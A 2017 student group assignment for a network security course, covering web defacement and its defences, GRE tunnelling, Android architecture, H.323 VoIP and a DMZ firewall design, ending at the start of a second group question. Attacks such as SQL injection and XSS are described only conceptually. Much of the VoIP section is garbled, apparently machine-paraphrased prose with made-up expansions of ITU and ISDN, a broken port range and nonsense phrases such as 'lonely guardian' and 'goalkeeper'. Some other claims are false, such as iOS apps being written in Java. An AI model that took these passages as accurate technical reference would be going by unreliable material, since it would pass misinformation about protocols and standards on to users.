Network Security Assignment

Course : Network Security

Course code : CT037-3-2-NWS

Due Date : 3rd October 2017

Lecturer : Nor Azlina Binti Abd Rahman

Intake UC2F1701IT(ISS)
Name Boo Ken Hwang (TP044677)
Loh Choon Way (TP041264)
Shahzad Hussain (TP040954)
Abdulaziz Aljawder (TP032807)

Table of Contents
Marking Table........................................................................................................................................3
Workload Matrix FOR 4 MEMBERS........................................................................................................4
Introduction...........................................................................................................................................5
Individual Part.......................................................................................................................................6
1.0 Web Defacement (Loh Choon Way TP041264)................................................................................6
1.1 What is web defacement.............................................................................................................6
1.2 How to protect from Web Defacement........................................................................................7
1.3 Tools for Protect from Web Defacement......................................................................................9
1.4 Method of Web Defacement.....................................................................................................13
1.5 Protect method from DDOS Attack............................................................................................14
2.0 Generic Routing Encapsulation (Boo Ken Hwang TP044677).........................................................16
2.1 What is Generic Routing Encapsulation (GRE)...........................................................................16
2.2 OSI Model of 7 Layer..................................................................................................................16
2.3 Advantage and Disadvantage of the GRE...................................................................................19
2.4 Difference of the GRE Tunnel.....................................................................................................20
2.5 Vulnerability Problem................................................................................................................22
2.6 Configuration of Generic Routing Encapsulation.......................................................................23
3.0 Android Security (Shahzad Hussain TP040954)..............................................................................26
3.1 Introduction of Android.............................................................................................................26
3.2 Android Architecture.................................................................................................................27
3.3 Android Architecture Layers......................................................................................................28
4.0 Voice over Internet Protocol H.323 (Abdulaziz Aljawder TP032807).............................................30
4.1 Introduction of Voice Internet Protocol.....................................................................................30
4.2 MAIN BODY of Internet Protocol Voice......................................................................................31
4.3 Steps of H.323 Call.....................................................................................................................32
4.4 VoIP Architecture.......................................................................................................................35
4.5 Multipoint Control Unit (MCU)..................................................................................................38
4.6 Conclusion of VoIP.....................................................................................................................41
Group Part...........................................................................................................................................42
Question 1.......................................................................................................................................42
Question 2.......................................................................................................................................44
Question 3.......................................................................................................................................47
Question 4.......................................................................................................................................49
Question 5.......................................................................................................................................51
Question 6.......................................................................................................................................53
Question 7.......................................................................................................................................54
Question 8.......................................................................................................................................56
 Question 9.......................................................................................................................................58
Question 10.....................................................................................................................................60
Question 11.....................................................................................................................................63
Question 12.....................................................................................................................................65
Question 13.....................................................................................................................................66
Conclusion...........................................................................................................................................68
Reference.............................................................................................................................................69

Marking Table
Individual (100%)
 4
3
2
1
4
3
2
1

(TP032807)
(TP032807)

Tasks Breakdown
Abdulaziz Aljawder
Abdulaziz Aljawder

Names and Intakes

Names and Intakes

Loh Choon Way (TP041264)

Loh Choon Way (TP041264)

Boo Ken Hwang (TP044677)

Boo Ken Hwang (TP044677)

Shahzad Hussain (TP040954)

Shahzad Hussain (TP040954)

Documentation (10) Documentation (10)

Referencing (10) Referencing (10)

Boo Ken Way

Group (40%)
(10) Research and Investigation (10) Research and Investigation

Diagram/Figures (10) Diagram/Figures (10)

Workload Matrix FOR 4 MEMBERS

Applicability (20) Critical Thinking and Applicability (20) Critical Thinking and

Hussain
Loh Choon Shahzad
Analytical (20) Analytical (20)
Configurations (10) Explanation (10)
Individual (60%)

Presentations (10) Presentations (10)

Aljawder
Grand Total (100) Grand Total (100)

Abdulaziz
 (TP041264 (TP040954 (TP032807
Hwang ) )
(TP044677 )
)
Project Task 25% 25% 25% 25%

Project Plan

 Individual Part 0% 100% 0% 0%

(Research &
References)

 Group Part 25% 25% 25% 25%

(Configuration and
Solution)

Chapter/Sections

 Question 1 100% 0% 0% 0%

 Question 2 25% 25% 25% 25%

 Question 3 0% 0% 0% 100%

 Question 4 25% 25% 25% 25%

 Question 5

 Question 6 0% 0% 100% 0%

 Question 7 25% 25% 25% 25%

 Question 8

 Question 9

 Question 10

 Question 11

 Question 12
  Question 13

Final Documentation

Introduction

Network security puts forward the key infrastructure of developing a

strong network security benchmark. Network security requires an
integrated approach to comprehensive defense, covering a variety of
methods. Deployment of security solutions can be challenging due to the
broad functionality available. Therefore, the focus of network security is to
protect the network infrastructure.

According to the situation, A company in Kuala Lumpur with sales,

engineering and finance departments 3 departments (customer
workstations). The sales office is located in Sri Lanka and has 50
employees. All departments are connected to the access switch and then
connected to the internal interface of the distributed switch and the
router. The firewall external interface is directly connected to the Internet
Service Provider (ISP) router.

The ISP completely manages the router, and Company A cannot control it.
The third interface on the firewall hosts several servers of the DMZ. These
servers include http / https, smtp and ftp applications. In addition, the
goal of the project is to protect the internal and DMZ hosts from external
threats.

The company has sent a number of network engineers to provide the

company has been trying to implement the solution. Many of the
challenges that need to be addressed are. Some notable challenges are
creating a network environment, connecting company A in Kuala Lumpur
and B in Sri Lanka, implementing Simple Mail Transfer Protocol (SMTP) to
protect data on the network so that only prospective recipients can read
the message, Implementation of intrusion detection system (IDS), virtual
private network (VPN) and Secure Sockets Layer (SSL)

Individual Part

1.0 Web Defacement (Loh Choon Way TP041264)

1.1 What is web defacement

Web defacement is the visual appearance of the site or webpage has changed by attack a
website. Hacker replace the hosted website to their own by break into their web server.
Mostly the method use for defacement is SQL Injections, by using this method can log on to
administrator accounts, and another method is obtaining username and password go through
FTP.

Defacement is consisting all the page, this page usually includes the defacer’s pseudonym or
“Hacking Codename”. Web defacer normally will make system administrator for failing to
the maintain server security. But sometimes the defacement is harmless, some of the defacer
will upload virus or delete files form the server. (Banffcyber.com, 2017)

1.2 How to protect from Web Defacement

1. Security audits and penetration testing

There are some vulnerabilities are not patch properly and hackers always finding those
backdoor to exploit it. The common of known vulnerabilities is in the security context system
on the server and import malicious code already executes by sending a buffer overflow
without logging on with connect to the server by use of open ports. To protect the system on
evaluating the security of an IT infrastructure, Regular audit and penetration testing are most
common helpful such as operating systems, improper configurations, or service and
application. (Banffcyber.com, 2017)

2.Defend yourself against SQL injection attacks.

Hackers will use SQL injection to attack SQL server by getting information existing data,
destroy information data, or changing information data of the database system. Most website
collect user information from input form, user information will directly put into SQL
statement within the web application. (Banffcyber.com, 2017)

The following is an example of hacker easily leads to and SQL injection attack.

Figure 1. SQL injection attack

By prevent the above injection, can use bound variables with prepared statement method.

Figure 2. Prevent SQL injection attack

But with the best method to preventing SQL injection is in the code to avoid using of
dynamic generated. In addition, where possible, validate input. For example:

 Limiting input only to accepted characters: e.g. Letters in a number field?

 Whitelisting: e.g. /[a-zA-Z0-9]{0,20}/, the set of possible values (if there is one)
 Length checks: e.g. 10 digits for 4 digit year field?
3. Defend yourself against Cross-Site-Scripting (XSS) attacks.

Hacker tries run some unauthorized code on the web application by using a web form to pass
scripting code which is called Cross Site Scripting. By this method, hackers can change the
setting of the website, stealing session cookies of other users of the website, or attack the
website by forming a XSS. To prevent XSS attacks, the web form through by user from
injecting code should prevent it. (Banffcyber.com, 2017)

One of the best practices to prevent cross site scripting attacks is to Properly Encode Output

Encode HTML Output

 If the data came from user input, a database, or a file

 Not 100% effective, but prevents most vulnerabilities

Encode URL Output

 If returning URL strings

The most common XSS attack is stealing cookies. Hacker import malicious code and will
steal all the cookies from visitor of the website to hacker. By prevent the attack of stealing
cookies is to use HTTP-Only cookies. Those JavaScript through document will be deny by
the HTTP send through, thus preventing cookies theft via XSS. Another prevent method is
using Web Application Firewalls (WAF), this application can check malicious input values,
modification of read-only parameters, filter out malicious output and block suspect requests.
(Banffcyber.com, 2017)

4. Prepare to respond to defacement incidents.

Detection tools only tell the website is defaced but without any action to be taken. To be
secure, it should be set as offline when defaced and go forward for investigation and
forensics. The hacker might will hack in deeper to the company or organisation to access
server or database.
In addition, organisation can use Banff Cyber’s WebOrion Restorer, this application able to
create a secured replica of the website, the replica website won’t contain any vulnerabilities
to the defaced server. (Banffcyber.com, 2017)

1.3 Tools for Protect from Web Defacement

1. Change Detection

Change detection is a free service tool, it will send daily, weekly or monthly notification
about the configured webpage any change on the text whether is added or remove. (Kumar et
al., 2017)

2. Status Cake

Status cake is another free service to configure the string on the page, it only alert when the
page has any unmatched. Status Cake can configure under single monitoring. (Kumar et al.,
2017)

 How frequently (30/60 seconds, 15/30/60 minutes and daily) to your webpage should
be checked
 How soon (0-60 minutes) alert to be triggered after the first downtime detected
 Blacklist Monitoring
 Select what all HTTP Status Code to be alerted
 Crawl Timeout
  Configure maintenance window so don’t get alert during known downtime

3. IPVTec

IPVTec is an online service tool, it will alert when the website defaced and send notified
through by email, SMS. (Kumar et al., 2017)

 SSL Certificate expires

 Website not available
 Hijacked
 Blacklist
 Malware detection

4. SUCURI

SUCURI is a software that offer service with Malware Scanning and Security monitoring, it
provides security and monitoring services for multi-language such as WordPress, phpBB and
others. (Kumar et al., 2017)

 Hidden malicious iFrames

 Conditional Redirects
 Anomaly Injections
 Missing website hardening best practice
 Obfuscated JavaScript infections

5. Site 24x7

This application server provide end to end monitoring services and defacement detection. The
best thing of this service is they can configure many combinations to secure the website from
defaced. (Kumar et al., 2017)
6. Visualping

This application enables to select part of the website area to monitor and detected. But is
more focus using on some major part by getting alert. (Kumar et al., 2017)

7. OnWebChange

OnWebChange can select multiple area webpage to detect, this software can monitor files
like PDF, video, images, and others. This software can notify by email, pushover, teamstinct,
or HTTP callback. (Kumar et al., 2017)
1.4 Method of Web Defacement

1. SQL Injection

SQL injection is a type of security exploit or loophole in SQL code, hackers go through from
the web form or manipulates the URLs on SQL parameters. Normally hackers will insert the
code into user input form that relate to SQL commands and execute. Another direct attack is
insert malicious code into string place for storage in a table. Malicious code only executed
when stored string concatenated into dynamic SQL command. (Learn Ethical Hacking and
Penetration Testing Online, 2016)

2. Cross Site Scripting

Cross site scripting (XSS) works when user input malicious code into a website, it will force
it do something on the application. XSS attack are very famous on attacking to biggest
website such as FBI, Apple, Facebook. (Learn Ethical Hacking and Penetration Testing
Online, 2016) Other website features commonly vulnerable to XSS attacks are:

• Search Engines
• Login Forms
• Comment Fields

3. Remote File Inclusion

Remote File Inclusion mostly found on every website. Hacker execute server-side commands
as user log in, this giving hacker access to files on the server. By this access authority, hacker
can take over the whole website system, (Learn Ethical Hacking and Penetration Testing
Online, 2016) RFI can lead dangerous happen on the website:

• Code execution on the web server

• Code execution on the client-side, such as Javascript, which can lead to other attacks
such as cross site scripting (XSS)
• Denial of Service (DoS)
• Data Theft/Manipulation

4. Local File Inclusion

Local File Inclusion (LFI) is hacker have the ability go through the server by means of
directory transversal. One of the common of LFI is to get password file, in the linux system it
will contain user information, LFI is quite similar with RFI. (Learn Ethical Hacking and
Penetration Testing Online, 2016)

5. DDOS Attack

Distributed denial of service attack is shut down the website makes user can’t view the
website. The website attack by DDOS will temporarily or indefinitely shut down, the
bandwidth and resources of any website not able access to legitimate users. (Learn Ethical
Hacking and Penetration Testing Online, 2016)

1.5 Protect method from DDOS Attack

1. Do It Yourself

Normally some programmer will write the Python scripts to filter out the bad traffic, and
some will use existing firewall to block the traffic. As nowadays DDOS attack type too much,
this few methods may couldn’t work as the attack too large. (Sean Leach, 2013)

2.Specialized On-Premises Equipment

Something similar to Do It Yourself, but this method is purchase and deploy dedicated DDoS
mitigation appliances. These specialized devices are special built, it will filter the malicious
traffic with detect and put locate in front of the server and router.

For the device some user may think the device is extra because user must be around the
device and this device do nothing until the server get attacked. Some more it cost expansive
to hire professional security engineers to control the devices. But these device disadvantage is
can’t handle huge volume attack. (Sean Leach, 2013)

3. Internet Service Provider (ISP)

There are some company will use the ISP to provide DDoS mitigation. Those companies
ISP’s have more stronger bandwidth that some company, it can handle huge volume attack,
but there are three key problem with the service: (Sean Leach, 2013)

 Lack of core competency

 Single provider protection
 No cloud protection

2.0 Generic Routing Encapsulation (Boo Ken Hwang TP044677)

2.1 What is Generic Routing Encapsulation (GRE)

Generic Routing Encapsulation (GRE) is a function of encapsulate to protect the protocol of

the packets to pass through the other protocol and direct go to the IP network.

The Generic Routing Encapsulation had been creating by the CISCO. It is a tunnelling tool to
process the data packet from the router to router. GRE has a private connection from one-to-
one network link. The Virtual Private Network (VPN) also have similar features same as
private communication. Example, router sending the encapsulated packet transmits over to
the internet, from the internet send the data packet to another router. This process called as
GRE Tunnel. The purpose is to protect the packet sent to another router by the internet.
Example, GRE tunnel is encapsulated the third part of OSI, which is the network layer
protocol. [GRE08]

2.2 OSI Model of 7 Layer

OSI is a model to define the network protocol and each layers has different function. There
have 7 layers in the network. OSI model of seven layers are Physical layer, Data Link Layer,
Network Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer. In
the GRE Tunnel, the network layer is required into it. It is about the router transport data
packet which was IP address to the internet. It provide the connection between each other to
transmit the data like VPN functionality. Transport layer also got include in the GRE Tunnel.
[Bea17]
Figure 1: GRE Encapsulation Packet of function [Tro17]

In the IP packets, GRE has encapsulated the network layer protocol which is the common
standard of protocol RFC 1701 and RFC1702. There are particular of protocol that needs to
implement it. The GRE has specific in RFC2784 and it was used into the IPv4 and IPv6
which is the IP address to encapsulate to the IPv4 packets. IPv4 address is finished, the IPv6
continues the IPv4 address that was bigger space compared to the IPv4 address. [ali17]

Generic Routing Encapsulation needs to work on encapsulate payload of an external packet

to make sure that the internal packet has transfer through the internet. This process gives the
GRE tunnel could send the data packet from the one-to-one router. The other router could not
know the IP information until the packet has reached the destination then the external packet
will be removed the security protection because the data packet has been sending it
successfully. The benefits are generic routing encapsulation wouldn’t publish to the public
network because this security is to make the user have a private communication to connect it
and send the sensitive information from both routers.[Mar11]

GRE Tunnel provides a port for devices so it could transfer the data packets. There have four
types of form to encapsulation the packet in generic routing encapsulation. Such as Delivery
Header (IPv4), GRE Header, Payload Header (IPv4/ IPv6) and Payload. [GRE17]

Form of encapsulate packet Function

Delivery header It is an external or encapsulate packet
header. IPv4 using protocol 47 to
transfer header and direct sent to the
GRE header.
GRE header GRE Header is the between of delivery
header and payload header which means
stock the GRE versions and types of the
payload. It also can stock to check the
tunnel key and serial number.
Payload header This is the internal or encapsulate packet
header. The function is to transport the
 IPv4 and IPv6 packet of protocol.
Payload Usually payload is the user data that
store in the packet to transport it.

Example of the GRE Encapsulation Packet Process:

Figure 2: GRE Encapsulation Packet Process [adm11]

Generic Routing Encapsulation tunnel can support the many types of packet and protocol to
run the progress. Example, Encapsulation, and De-Encapsulation on the Switch. [JUN12]

Encapsulation Process

- The switch receives the payload that it needs to send to the GRE Tunnel ports.

- The tunnel ports have encapsulated the data information into the GRE packets and system
will take GRE packet encapsulate into IP packet.

- IP packet will follow the address and destination to transport it.

De-Encapsulation Process
- If the IP packet has reached the destination, the switch will check the destination address
to confirm that the address is correct.

- IP header will be removed and the packet also sent it to the GRE protocol.

- GRE protocol will separate from the GRE header and submit the packet to transmit it.

2.3 Advantage and Disadvantage of the GRE

[Con17]

Advantage

- Generic Routing Encapsulation can encapsulate multiple protocol in the GRE Tunnel.

- GRE Tunnel also provide the function for user to send the types of traffic from one
destination to another destination.

- GRE make user can easy to use and learn the process of GRE command prompt.

Disadvantage

- GRE has encapsulated the external packet but the internal packet still need IPsec to
secure the payload if don’t add IPsec which is ESP features, it could not fully protect
the packet.

- GRE don’t provide any security of encryption and authentication but IPsec has this
few features to make GRE Tunnel become more secure.

- GRE tunnel create a point-to-point connection like VPN but it is less security.

2.4 Difference of the GRE Tunnel

GRE vs IP-in-IP [X4B17]

GRE tunnel will send the payload packet to the destination, if reach the endpoint of GRE
header, the GRE tunnel will be deleted and payload still sending to the final destination.

GRE Tunnel advantages:

- The single backbone protocol could package more protocol in the GRE tunnel.

- The GRE tunnel provides a solution that can solve the limited hops of the network.

- GRE tunnel connects to the discrete subnets.

- VPN wide area network can be allowed

- Better support the devices and system that already can’t operate the IP-in-IP packets.

- The tunnel can receive the packets according to some optional field so will be useful in
some UDP application.

Security features

GRE protocol could use the additional encrypted key that can provide the tunnel to increase
the security for the address.

IP-in-IP has a similar function which is same as GRE. It works encapsulation protocol but it
more easily than GRE tunnel. By using this technique, IP protocol will be encapsulated and
put in the IP header. Besides that, the difference with GRE tunnel is IP-in-IP tunnel can’t
proceed more at the same time such as multiple protocols.

The IP-in-IP has some advantage that is different as GRE Tunnel:

- Reduce the overhead because of the encapsulate layer become less

- Encapsulation of the IP packet can support the devices but not for GRE protocol

- It can support the single tunnel between the two of endpoints.

GRE vs IPsec [GRE13]

GRE and IPsec are different in security features. GRE works in encapsulate the GRE Header.
It means the GRE tunnel only protect the external protocol of GRE Header. If IP packet needs
send one network to another, while using the GRE Tunnel, it can’t be analysed or processed
like IP packets by any intermediate of the router.

Generic Routing Encapsulation has given the simple steps to guide the user and provide the
easier way to help user could know the configuration. The packet that sent to the GRE tunnel
will be routed to the port and cover the packet then become new packets.

IPsec is a protocol that helps to solve the GRE Tunnel Security Issues. It allows the packet
that using GRE Tunnel cover the external and IPsec can combine with GRE Tunnel to wrap
the internal protocol. It encapsulates the internal protocol to aware the unauthorized user
could break the GRE. It is more secure than GRE while combining two feature together.

Example, the GRE packet has added one of the securities called Encapsulating Security
Protocol. This security could provide the service to protect the IP address. The GRE give a
VPN tunnel to pass through the tunnel but it doesn't provide the encryption for the protocol.
There have some security threats could affect the GRE Tunnel progress. Besides that, IPsec is
using the full set of protocol for analysis the encryption.

The difference of GRE and IPsec is GRE process the data faster than IPsec because it doesn't
provide any encryption and IPsec is converted the packet and add the security of encrypting
and decrypting so it should take some time to proceed it. IPsec has encapsulated the payload
which means the user data or internal packet of a protocol. IPsec can’t be supported in
multiple protocols like GRE Tunnel but it provides security features to secure during the
tunnel process.

Example of GRE Tunnel with IPsec encryption

Figure 3: [Enc17]
From the picture, it need to prepare 3 routers and GRE Tunnel to do the configuration of the
process and proceed the encryption to protect the packets.

2.5 Vulnerability Problem

[Cis17]

There has a problem in this version of GRE got decapsulation vulnerability. It is the version
1.0 of GRE program. There has some bug in the GRE, it has listed out the problem while the
developer has understood the problem. I have three of bugs that make the GRE can’t
function. There have a people who are from Phenoelit that report the issue to let Cisco know
about it.

The product that has been affected is Cisco IOS software such as 12.0, 12.1, 12.2 version.
The version has to give the GRE functionality become not working in GRE Tunnel between
two points of routers. It still has some version are not affected so it can be used as usual.

The Cisco has created a sample of solution to teach user know how to solve and fix the
problem. I need to debug the tunnel so GRE tunnel could process the function. There also
update some new features to make sure that the problem can’t appear again. The software got
a problem of the version in 2006. It also giving some website for the user to know more
information and try to get the feedback from users.

Limitation of GRE Tunnel [Con171]

 Cisco NX-OS has support the GRE header which is RFC 2784 and RFC1701 is not
support by the cisco NX-OS.
 The Tunnel process need same VRF, if not the data can’t transmit and failed to
proceed to pass through the GRE Tunnel.
 GRE Tunnel don’t support the function to run the multicast.
2.6 Configuration of Generic Routing Encapsulation
[Aru16]

Figure 4: Example of Configuration of GRE Tunnel

Example of the process of GRE Tunnel command prompt in cisco packet tracer:

Figure 5: Configuration of Router 1

This is the first step to configure the router 1 to proceed for GRE Tunnel Connection. It create
the port to link the other router and put the IP address and make the GRE Tunnel to
understand the final destination.
 Figure 6: Configuration of Router 2

This is the second step to configure the Router 2 to add the IP address and open the port to
link the other router. After the process of Router 2, the connection between Router 1 and
Router 2 has connected.

Figure 7: Configuration of OSPF in Router 1

This is the third step to configure with OSPF in router 1 to add the network area of address.
 Figure 8: Configuration of OSPF in Router 2

This is the last step to configure the router 2 with OSPF to run similar as Router 1 but the
network area address is different.

After this few command prompt, the connection between sender and receiver has built the
GRE Tunnel in Cisco Packet Tracer. The configuration has completed to the both user. The
sender can transmit the packet through the receiver by using GRE Tunnel to proceed it.

3.0 Android Security (Shahzad Hussain TP040954)

3.1 Introduction of Android

Tablets and smartphones are becoming popular each day and year, and the operating system
for these devices are as important as these devices. Operating system such as Android runs
for low powered battery devices and are for hardware just like Wi-Fi, camera, light, different
sensors, and touch screen. Just like all other operating systems, Android enables applications
to make sure all the running in a way to provide a characterized environment for applications.
Just like applications for other operating such as iOS and Symbian, Android applications are
also written in java and run on virtual machines. These applications are executed by Dalvik
which is a core component and executes its own byte code. Android market is a place where
all the applications can be accessed for users to download. Google is the one who bought the
Android platform from Android Inc. and released Open Source Project. Open handset
Alliance (OHA) is a software to develop applications and is freely acquired from a central
repository [Goo] and the BSD and Apache license can be modified. [Ope17]. Android system
is based on a Linux 2.6 Kernal which allows Android to run effectively and efficiently on
mobile devices. The focus for Android is always to optimize the infrastructure on the limited
resources on mobile devices. [Lia10]

3.2 Android Architecture

The modified Linux Kernel operates as the HAL, and Android Architecture runs on three
different layers such as Application layer, Libraries layer, and Linux Kernel layer as shown in
Figure 1. These layers provide networking functionality, memory management, process
management, and device drivers. [INC17]
 Figure 1

Blue items (Application layer) runs in the Dalvik Virtual Machine and written in Java. Green
items (Library layer) are written in C++/C.

3.3 Android Architecture Layers

1. Application Layer

It is the top layer of the android architecture and contains all the necessary applications like
browser, call, SMS, Google maps, calendars, and other applications. To operate these
applications, the applications works with end user. Application layer also contains the
Application framework and developers can extend and reuse the components presented in
API. Application layer have different managers such as: - [Lia10]

 Activity manager
This manager controls all the activities and manages the lifecycle of application.

 Resource manager
This manager gives access to encode resources like graphics, etc.

 Notification manager
This manager displays custom alerts in status bar for all the applications.

 Location manager
This manager handles a geographic location of the user.

 Package manager
This manager retrieves the data and information of the installed packages on the
device.

 Window manager
This manager creates layouts and views.

 Telephony manager
This manager stores all the information and settings of a network connection about
services on device.

2. Android Runtime

Android has a DVM (Dalvik Virtual Machine) where all the applications executes. It is also
allowing user to use more than one application at the same time. [Lia10]

3. Libraries

Android library is written in C++/C and has its own libraries. Application framework can be
used to access these libraries directly as these libraries cannot be accessed directly. These
libraries have libraries for video formats, web libraries to access web browsers, etc. [Lia10]

4. Linux Kernel
It is the core layer of android architecture and gives services like security, memory
management, and power management which helps in hardware and software for better
communication. [Lia10]

4.0 Voice over Internet Protocol H.323 (Abdulaziz Aljawder

TP032807)

4.1 Introduction of Voice Internet Protocol

Internet Protocol Voice over Voice (VoIP) transmission in 1973 was the IP for voice use
designed for ARPA.NET. However, VoIP entered the market in the 1990s as a way to save on
transmission costs by leveraging rich voice information constraints. Its capacity is to use
existing LAN and WAN availability for voice communications to reduce the cost of
enterprise open telephone system (PSTN) operators. At the same time, the ITU (Global
Media Communications Consortium) advanced H.323 as an agreement in 1999, which is an
ISDN (Joint Management Computerized System) style VoIP practice. In addition, by the
beginning of 2000, the IETF completed the standardization of Internet-based VoIP protocols
called SIP.

H.323 has the advantage of being able to serve multiple parts, including media
communications (information conferencing, video and voice), and applications that are
essential to interoperate with the PSTN. H.323 is established for communication through an
IP system and is the best way to communicate via a packet-based network.

Today, since 2006, H.323 cannot be long, SIP is better, suitable for IP and Web applications,
so become the choice of the Internet community. However, SIP has a large vulnerability,
leading to security threats, H.323 has better security. Finally, H.323 is more inclined to the
local network.

4.2 MAIN BODY of Internet Protocol Voice

VoIP H.323 Protocols

VoIP H.323 Protocols also known as “Packet-based multimedia communications systems” is

an international voice over IP standard defined by ITU. There are some versions.

1 Version: multimedia over LAN in (1996)

2 Version: telephony over IP in (1998)
3 Version: Add Communications across administrative domains in (1999)
4 Version: Add supplemental services and web-based service creation in (2000)
5 Version: Add use of URLs and DNS and video conferencing support in (2003)
6 Version: Add security authentication in (2006)
H.323 is not just standalone protocol, rather than an entire group of protocols. The individual
protocols used under umbrella of H.323 include.

1. H.225.0 for call signalling

2. Q.931, a protocol borrowed from ISDN, also used for call signalling

3. H.245 for negotiating audio/video channel parameters

4. H.235 for security and authentication

5. RTP, Real-time Protocol by IETF, used to transmit audio/video streams

6. H.450.x for additional services like call transfer, call diversion, etc.

4.3 Steps of H.323 Call

Setup:

 First terminal register itself with the gatekeeper using the RAS protocol (Register,
admission, status) sending an ARQ message and receiving an ACF message.
 using H.225 protocol (used for setup and arrival of the call) terminal T1 sends a
SETUP message to Terminal 2 asking for an connection. This message contains the IP
address, port and name of the calling client or the IP address and port of the called
client.
 Terminal 2 sends a CALL PROCEEDING message warning on the attempt to
establish a call
 Terminal 2 must register it in the gatekeeper as T1 previously do.
 Now warning message send to shows that beginning of the connection.
Control signalling:

At this stage, transactions using H.245 conventions (conference control), messages between
two terminals (demand and reply) establish their own identity as well as slaves, members of
the restrictions and sound and video codecs. When the transaction is complete, open the
communication channel (IP address, port).

The main steps of H.245:

 Terminal Capability Set (TCS). Message sent to support the terminals that take part
in a call
 Open Logical Channel (OLC). A message sent to open the logical channel which
contains information that allows the reception and codification of the data. It contains
information of the data type that will be sent.

Audio:

 Step to start the communication using the (RTP)/(RTCP) protocol.

Call release:

 The calling terminal can initiate the ending process using the (Close Logical Channel)
and (End Session Command) messages to finish the call using again H.245.
 a release complete message is being sent to stop the connection using H.225.
 the final step is register the terminals in the gatekeeper are stopped by using RAS
protocol.
H.235 protocols for security platform in H.323:

H235.0: Security framework for H-series

 View of H.235.x and common procedures with baseline text.

H.235.1: Baseline Security Profile

  Authentication & integrity for H.225.0 signalling using shared secrets.

H.235.2: Signature Security Profile

 Authentication for H.225.0 signalling using X.509 digital certificates and signatures.

H.235.3: Hybrid Security Profile

 Authentication & integrity for H.225.0 signalling using an optimized combination of

X.509 digital certificates, signatures and shared secret key management; specification
of an optional proxy-based security processor

H.235.4: Direct and Selective Routed Call Security

 Key of administration systems in corporate and in interdomain conditions to get key

material for securing H.225.0 call motioning in GK coordinate directed/particular
steered situations.

H.235.5: Framework for secure authentication in RAS

 Secured key (using EKE/SPEKE approach) in combination with Diffie-Hellman

H.235.6: Voice encryption profile

 Key management and encryption mechanism for RTP.

H.235.7: Usage of the MIKEY Key Management Protocol for the (SRTP)

 Usage of the MIKEY key management for SRTP.

H.235.8: Key Exchange for SRTP using secure signalling channels

 SRTP keying parameter transport over secured signalling channels (IPsec, TLS,
CMS).
H.235.9: Security Gateway Support for H.323

 Discovery of H.323 Security Gateways (SG = H.323 NAT/FW ALG) and key
management for H.225.0 signalling.

4.4 VoIP Architecture

The H.323 architecture enables end-to-end signalling such as terminal interconnects and
logical channel establishment, as well as TCP / UDP ports (16384-3327) that use IP addresses
in particular. The H.323 organization consists of at least one area, and a region is a wise
authorization of the h323 gadget, supervised by a lonely guardian. Regional restrictions can
be established on regulatory breakpoints, tend to structure, geology, etc., including more
regional oversight, including more gatekeepers, in the form 3 of the work patterns, and can be
accessed in the widget 2001-02 The following is the H.323 regional project case.

Terminals:

In terminals substance the connection endpoint is on a LAN, which additionally underpins

constant, 2-route connection with another H.323 element, terminals must help voice (audio
codecs) and signalling and setup (Q.931, H.245, RAS)
Gateways:

The gateway is the interface between the LAN and the switching circuit network, which
explains the communication technology, the design between networks, call setup and
removal, and compression, and voice packets are like IP / PSTN gateways.

Gatekeepers:

The gatekeeper is a smart gadget for H.323 architecture and administration Each goalkeeper
handles an area (a focused endpoint, portal, and MCU). As David shows, it has an
accompanying mandatory feature:

- Admission control (verification of end-points authorization to place and

receive calls)
- Address translation = telephone alias -> IP
- Bandwidth control (if required by the call)
- Zone management

Gatekeepers also may implement optional functions and features such as:

- Authorization
 - Resource management
- Call control signalling = act as rendezvous point also for terminal-to-terminal
signalling (H.245)
- Resource reservation = for end-point not able to run reservation protocols like
RSVP
- Call management = multimedia calls and complex services
- Gatekeeper management information = remote management via SNMP on
standard MIBs
- Directory services.

Every gatekeeper can be an proxy signalling, and might be the interface toward extra
services, may likewise compel information stream exchanging, carrying on as a conventional
PBX (computational and traffic burden).

4.5 Multipoint Control Unit (MCU)

MCU (Multipoint Control Unit) is an endpoint that backings gatherings between at least three
endpoints. It can be still solitary gated like PC or incorporated into a gateway, gatekeepers or
terminal, comprises of Multi-Point Controller (MC) and Multi- (MP)

- MC = handles control and signalling for conference support

- MP = receives streams from endpoints, processes them, and returns them to
the endpoints in the conference.

VoIP H.323 gateways configuration:

Gateway1

Gateway2
Gatekeeper 1

Gatekeeper2

VoIP H.323 vs VoIP SIP:

4.6 Conclusion of VoIP

H323 and SIP have advantages and disadvantages. Unlike H.323, SIP leaves the details of the
implementation of the feature to the developer, which gives great flexibility in designing or
using protocols. SIP is also simpler than H.323, it requires fewer messages to build sessions.
H.323 requires a relatively large number of message exchanges to build and manage sessions,
but it is also highly reliable and secure. Thanks to the flexibility and scalability of SIP, it
quickly gained momentum in the early adopters of today's booming IP telephony systems.
H.323 also has a tightly defined service implementation and all instances of H.323 that can
support H.323 across firewalls. In addition, VoIP H.323 still requires some of the traditional
providers. In addition, H.323 requires a lot of flexibility and performance improvements, as
well as adding more security options included in H.235.

Group Part

Question 1
In the networks, normally the internet on local area network from untrusted networks gonna
be separate by demilitarized zone (DMZ) which is physical or logical subnetwork. External
facing servers, some internal LAN remain unreachable from the internet but only allow
services and resources locate in the DMZ. Hackers will be blocked to direct access the
internet by the LAN with the additional layer from provider. (Cobb, 2012)
DMZ store the service of users on the internet, basically will store those services such as
Web, Mail, DNS, FTP, and VoIP. Hackers can reach those services in the DMZ so the DMZ
need to be stronger defends to constant attack. (Cobb, 2012)

DMZ is designed by few ways, the two common methods are single and dual firewalls. It
depends on the network requirements to expand create architectures. Single firewall design
with at least three network interfaces to create a network architecture containing with DMZ.
The first interface from ISP to firewall form by external network, second network interface
form the internal network, and third network form the DMZ. (Cobb, 2012)

Another method more secure create a DMZ with two firewalls. First firewall configured to
allow traffic destined to DMZ only, internal network from the DMZ only receive traffic
which is second firewall or internal firewall. It is using two firewalls because consider to
more secure since two devices would compromised if hackers ready attack and will access
the internal LAN. For example, a network intrusion detection and prevention system located
in a DMZ that only contains as Web server can block all traffic except HTTP and HTTPS
requests on ports 80 and 443. (Cobb, 2012)
As a network security specialist, will recommended on using Cisco ASA 5500-X with
Firepower Services, this model Stay more secure. This NGFW has earned the highest security
effectiveness scores in third-party testing for both NGIPS and AMP, blocking 99.4% and
99.2% of threats, respectively. Get visibility into and control over activity across your
network. Gain insight into users, apps, devices, threats, files, and vulnerabilities. Extend
protection from the data centre to mobile devices, integrated approach to threat defense
reduces capital and operating costs as well as administrative complexity by consolidating
multiple security services in a single platform. Automate security tasks to increase agility and
speed remediation. (Cisco, 2017)

Question 2
The File Transfer Protocol (FTP) is basically for transferring files from one computer to
